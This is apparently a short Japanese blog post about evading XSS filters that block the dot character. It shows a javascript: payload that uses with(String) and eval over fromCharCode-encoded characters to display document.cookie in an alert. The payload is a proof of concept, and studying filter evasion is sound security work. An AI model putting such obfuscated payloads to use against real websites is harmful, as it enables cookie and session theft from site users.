これは、厳しい・・・本気で厳しいかも。

XSS の evasionネタ。 ドットが使えない場合に、代わりに with を使う。たとえば、 javascript:with(String)eval(fromCharCode(0x61,0x6c,0x65,0x72,0x74,0x28,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x63,0x6f,0x6f,0x6b,0x69,0x65,0x29)) で Cookie がアラート表示される。